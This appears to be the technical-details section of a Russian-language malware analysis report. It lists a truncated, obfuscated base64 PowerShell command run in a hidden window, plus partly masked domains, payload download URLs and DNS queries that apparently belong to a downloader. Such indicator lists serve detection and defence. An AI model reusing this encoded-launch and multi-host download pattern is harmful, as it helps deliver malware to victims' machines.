Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAYABTAEMAcgBgAGkAcABUAH0AIAA9ACAAJgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBjAHQAJwAsACcAbgBlACcALAAnAHcALQBvAGIAagBlACcAKQAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIAAoACIAewAxAH0AewAwAH0AewAyAH...
- 'is##.net':80
- 'je####chibald.ca':80
- 'av##nt.com':80
- 'av##nt.com':443
- 'cb##.net':80
- 'cb##.net':443
- 'ga#####centrechurch.org':80
- 'ga#####centrechurch.org':443
- http://is##.net/aHHYvjdtQ/
- http://je####chibald.ca/WVzVGjC/
- http://av##nt.com/BDPpQKz/
- http://cb##.net/pSxKT/
- http://ga#####centrechurch.org/WLdOjnxFA/
- 'av##nt.com':443
- 'cb##.net':443
- 'ga#####centrechurch.org':443
- DNS ASK is##.net
- DNS ASK je####chibald.ca
- DNS ASK av##nt.com
- DNS ASK cb##.net
- DNS ASK ga#####centrechurch.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAYABTAEMAcgBgAGkAcABUAH0AIAA9ACAAJgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBjAHQAJwAsACcAbgBlACcALAAnAHcALQBvAGIAagBlACcAKQAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIAAoACIAewAxAH0AewAwAH0AewAyAH...' (со скрытым окном)